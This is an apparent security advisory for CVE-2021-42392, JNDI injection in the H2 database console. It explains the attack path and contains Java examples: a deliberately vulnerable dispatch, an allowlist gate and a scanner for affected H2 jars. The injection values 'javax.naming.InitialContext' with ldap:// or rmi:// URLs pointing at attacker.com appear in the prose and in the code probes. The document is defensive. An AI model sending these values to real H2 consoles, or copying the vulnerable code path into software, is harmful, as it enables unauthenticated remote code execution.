Severity: Unknown
Description: The org.h2.util.JdbcUtils.getConnection method of the H2 database takes as parameters the class name of the driver and the URL of the database. An attacker may pass a JNDI driver name and a URL leading to an LDAP or RMI server, causing remote code execution. This can be exploited through various attack vectors, most notably through the H2 Console, which leads to unauthenticated remote code execution.
CVSS Score: N/A
1. Risk Assessment
CVE-2021-42392 is a remote code execution (RCE) vulnerability in the H2 database caused by JNDI injection. `org.h2.util.JdbcUtils.getConnection` accepts a caller-supplied driver class name and connection URL and loads whatever class is named; if that class implements `javax.naming.Context` (for example `javax.naming.InitialContext`), H2 performs a JNDI lookup of the supplied URL instead of a JDBC connect. An `ldap://` or `rmi://` URL therefore makes the server contact a host the attacker controls and instantiate whatever that host returns. Affected versions run from 1.1.100 through 2.0.204; the fix shipped in 2.0.206. The method is reachable through several call paths, and the most impactful is the H2 Console: its login form hands the driver class and URL straight to this method before any credential is checked, so exploitation through the console needs no valid database user or password. The console listens only on localhost unless it is started with `-webAllowOthers`, so the practical exposure depends on how it was deployed; instances reachable from the internet or a low-trust network are at high risk. The EPSS score of 0.907730000 (roughly 91%) indicates a high probability of exploitation in the wild. Exploitation is straightforward: the attacker needs only a reachable console, an LDAP or RMI server under their control and one crafted login request. The business impact ranges from data theft and data corruption to full compromise of the host, including ransomware deployment. Confidentiality (data theft), integrity (data modification) and availability (service disruption) are all affected.
2. Potential Attack Scenarios
The most direct path runs through the H2 Console. The attacker first finds a reachable console, typically a web UI on the application's HTTP port or on the standalone console's default port 8082. The console login form is served before any authentication, and it lets the client choose the driver class as well as the JDBC URL. The attacker sets the driver class to `javax.naming.InitialContext` and the URL to a JNDI reference such as `ldap://attacker.com/evil` (an `rmi://` URL works the same way). When the console passes these values to `JdbcUtils.getConnection`, H2 instantiates the naming context and looks up the URL, which opens an outbound connection to the attacker's LDAP server. That server answers with a JNDI reference whose resolution either loads a class from an attacker-controlled codebase or, on JVMs that block remote codebases (the default since JDK 8u191 and 11.0.1), deserializes an embedded object or instantiates a local factory class that already exists on the classpath. Either way the attacker's code runs with the privileges of the JVM hosting H2, giving control of the server for malware installation, data theft or service disruption. No database credentials are involved at any point, which is why exposure of the console alone is sufficient.
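To make the code path concrete, the following added example (written for this page, not H2's own source) mirrors the shape of the vulnerable dispatch described above and places a hardened gate in front of it. The class, method and allowlist names are assumptions for the illustration; `Class.forName` stands in for H2's own class-loading helper.

```java
import java.sql.Connection;
import java.sql.Driver;
import java.sql.SQLException;
import java.util.Locale;
import java.util.Properties;
import java.util.Set;
import javax.naming.Context;
import javax.sql.DataSource;

/** Added illustration of the CVE-2021-42392 code path and a gate in front of it. Not H2 code. */
public class JndiDriverGate {

    /** Vulnerable shape: load whatever class the caller names, and let a JNDI Context look up whatever URL the caller passes. */
    static Connection vulnerableGetConnection(String driver, String url, String user, String password) throws Exception {
        Class<?> d = Class.forName(driver); // stand-in for H2's class loading helper (assumption)
        if (Driver.class.isAssignableFrom(d)) {
            Driver jdbc = (Driver) d.getDeclaredConstructor().newInstance();
            Properties props = new Properties();
            props.setProperty("user", user);
            props.setProperty("password", password);
            return jdbc.connect(url, props);
        }
        if (Context.class.isAssignableFrom(d)) {
            // With driver = "javax.naming.InitialContext" and url = "ldap://attacker.com/evil" this is an
            // outbound JNDI lookup to the attacker's server, performed before any credential is checked.
            Context ctx = (Context) d.getDeclaredConstructor().newInstance();
            DataSource ds = (DataSource) ctx.lookup(url);
            return ds.getConnection(user, password);
        }
        throw new SQLException("Unsupported driver class: " + driver);
    }

    /** JDBC drivers this application is willing to load (assumed allowlist for the example). */
    static final Set<String> ALLOWED_JDBC_DRIVERS = Set.of("org.h2.Driver", "org.postgresql.Driver");

    /**
     * Hardened gate, evaluated before any class is loaded: allowlisted JDBC drivers may only get a jdbc: URL,
     * and JNDI contexts may only resolve container-local java: names, never a URL naming a remote service
     * (ldap, ldaps, rmi, iiop, dns and so on). Everything else is refused.
     */
    static boolean isAllowed(String driver, String url) {
        if (driver == null || url == null) {
            return false;
        }
        String lower = url.toLowerCase(Locale.ROOT);
        if (ALLOWED_JDBC_DRIVERS.contains(driver)) {
            return lower.startsWith("jdbc:");
        }
        if (driver.startsWith("javax.naming.")) {
            // "java:" is the container's local namespace; a scheme with an authority ("://") is always remote.
            return lower.startsWith("java:") && !lower.contains("://");
        }
        return false;
    }

    static Connection hardenedGetConnection(String driver, String url, String user, String password) throws Exception {
        if (!isAllowed(driver, url)) {
            throw new SQLException("Refusing driver/url pair: " + driver + " / " + url);
        }
        return vulnerableGetConnection(driver, url, user, password);
    }

    public static void main(String[] args) {
        String[][] probes = {
            {"org.h2.Driver", "jdbc:h2:mem:test"},                        // legitimate JDBC connect
            {"javax.naming.InitialContext", "java:comp/env/jdbc/app"},    // container-local JNDI, acceptable
            {"javax.naming.InitialContext", "ldap://attacker.com/evil"},  // the CVE pattern, refused
            {"javax.naming.InitialContext", "rmi://attacker.com/evil"},   // same via RMI, refused
            {"com.example.Anything", "jdbc:h2:mem:test"},                 // unknown class, refused
        };
        for (String[] p : probes) {
            System.out.printf("%-30s %-30s %s%n", p[0], p[1], isAllowed(p[0], p[1]) ? "allowed" : "REFUSED");
        }
    }
}
```

The important design choice is that the gate decides on the string pair before anything is loaded or looked up; checking after `Class.forName` or after `lookup` is too late, because the JNDI resolution itself is what executes the attacker's payload.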
3. Mitigation Recommendations
The primary mitigation is to upgrade H2. Affected versions run from 1.1.100 through 2.0.204, so 1.4.200 (the last 1.4.x release and the version most applications still bundle) is vulnerable; the fix is in 2.0.206, so upgrade to 2.0.206 or later. If upgrading immediately is not feasible, several workarounds reduce exposure. First, do not expose the H2 Console: leave it disabled in production (in Spring Boot, `spring.h2.console.enabled=false`), do not start it with `-webAllowOthers`, and if it must exist, reach it only from trusted networks through an authenticating reverse proxy, since the console's own login form is the attack surface and cannot protect itself. Second, never pass user-controlled driver class names or URLs to `JdbcUtils.getConnection`; if the application legitimately obtains a DataSource through JNDI, allow only container-local `java:` names. Third, confirm that `com.sun.jndi.ldap.object.trustURLCodebase` and `com.sun.jndi.rmi.object.trustURLCodebase` are `false` (the default since JDK 8u191 and 11.0.1; on older JVMs set them explicitly as `-D` arguments). This only blocks remote class loading; deserialization and local-factory JNDI vectors remain, so treat it as defense in depth rather than a fix. Lastly, monitor for outbound LDAP (389/636) and RMI (1099) connections originating from hosts running H2, and alert on console login requests whose driver field names a `javax.naming.*` class.
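Because the upgrade is the only real fix, the first practical step is finding every copy of H2 in the affected range, including copies nested inside fat jars and WAR files. The following audit is an added example for this page (not an H2 project tool); it matches jar file names of the form `h2-<major>.<minor>.<build>.jar` against the advisory's range and runs against a constructed sample tree of empty placeholder files when no path is given.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import java.util.stream.Stream;
import java.util.zip.ZipEntry;
import java.util.zip.ZipFile;

/** Added example: locate H2 jars in the CVE-2021-42392 affected range (1.1.100 through 2.0.204). */
public class H2VersionAudit {
    // h2-<major>.<minor>.<build>.jar, either a file on disk or an entry inside a jar/war/ear
    static final Pattern H2_JAR = Pattern.compile("(?:^|/)h2-(\\d+)\\.(\\d+)\\.(\\d+)\\.jar$");
    static final int[] FIRST_AFFECTED = {1, 1, 100}; // advisory: >= 1.1.100
    static final int[] FIRST_FIXED = {2, 0, 206};    // advisory: fixed in 2.0.206

    static int compare(int[] a, int[] b) {
        for (int i = 0; i < 3; i++) {
            if (a[i] != b[i]) {
                return Integer.compare(a[i], b[i]);
            }
        }
        return 0;
    }

    static boolean isAffected(int[] v) {
        return compare(v, FIRST_AFFECTED) >= 0 && compare(v, FIRST_FIXED) < 0;
    }

    /** Records "location -> version" if the name is an H2 jar whose version falls in the affected range. */
    static void check(String location, String name, List<String> hits) {
        Matcher m = H2_JAR.matcher(name);
        if (!m.find()) {
            return;
        }
        int[] v = {Integer.parseInt(m.group(1)), Integer.parseInt(m.group(2)), Integer.parseInt(m.group(3))};
        if (isAffected(v)) {
            hits.add(location + " -> " + v[0] + "." + v[1] + "." + v[2]);
        }
    }

    /** Walks root, inspecting plain jar files and the entries nested inside jar/war/ear archives. */
    static List<String> scan(Path root) throws IOException {
        List<String> hits = new ArrayList<>();
        try (Stream<Path> walk = Files.walk(root)) {
            for (Path p : (Iterable<Path>) walk::iterator) {
                if (!Files.isRegularFile(p)) {
                    continue;
                }
                String name = p.getFileName().toString();
                check(p.toString(), name, hits);
                if (name.endsWith(".jar") || name.endsWith(".war") || name.endsWith(".ear")) {
                    try (ZipFile zf = new ZipFile(p.toFile())) {
                        // e.g. Spring Boot BOOT-INF/lib/h2-1.4.200.jar or WEB-INF/lib/h2-1.4.200.jar
                        zf.stream().map(ZipEntry::getName).forEach(n -> check(p + "!/" + n, n, hits));
                    } catch (IOException notAZip) {
                        // placeholder files in the sample tree or corrupt archives: nothing nested to inspect
                    }
                }
            }
        }
        return hits;
    }

    /** Constructed sample: empty files named like real H2 jars, so the example runs without an application to audit. */
    static Path constructedSampleTree() throws IOException {
        Path dir = Files.createTempDirectory("h2-audit-sample");
        Files.createFile(dir.resolve("h2-1.0.79.jar"));   // before the affected range
        Files.createFile(dir.resolve("h2-1.4.200.jar"));  // last 1.4.x, affected
        Files.createFile(dir.resolve("h2-2.0.204.jar"));  // last affected release
        Files.createFile(dir.resolve("h2-2.0.206.jar"));  // first fixed release
        return dir;
    }

    public static void main(String[] args) throws IOException {
        Path root = args.length > 0 ? Path.of(args[0]) : constructedSampleTree();
        List<String> hits = scan(root);
        if (hits.isEmpty()) {
            System.out.println("no H2 jars in the affected range under " + root);
        }
        hits.forEach(System.out::println);
    }
}
```

Run it as `java H2VersionAudit /path/to/deployments` to audit a real tree. Matching on file names misses builds that shade or rename H2, so pair this with the build tool's dependency report (for example `mvn dependency:tree`) and scan the artifacts that are actually deployed rather than a developer checkout.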
Relevant resources include:
H2 Database Security Advisory: https://github.com/h2database/h2database/security/advisories/GHSA-h376-j262-vhq6
JFrog Blog: https://jfrog.com/blog/the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console/
4. Executive Summary
CVE-2021-42392 is a critical vulnerability in the H2 database that allows attackers to execute code remotely, potentially compromising the entire system. It stems from `JdbcUtils.getConnection` accepting an arbitrary driver class and URL, which turns a database connection request into a JNDI lookup against an attacker-controlled LDAP or RMI server. The H2 Console, commonly used for database administration, is the most dangerous vector because its login form reaches the vulnerable code before any credentials are checked. Successful exploitation can lead to data breaches, data corruption or complete system takeover. Versions 1.1.100 through 2.0.204 are affected, including the widely deployed 1.4.200; upgrade to H2 2.0.206 or later. If an immediate upgrade is not possible, disable or firewall the H2 Console and ensure no user-controlled driver names or URLs reach H2's connection code. Addressing this vulnerability is a high priority: the potential business impact is significant and exploitation is straightforward. Prompt action will minimize the risk of a successful attack and protect valuable data and systems.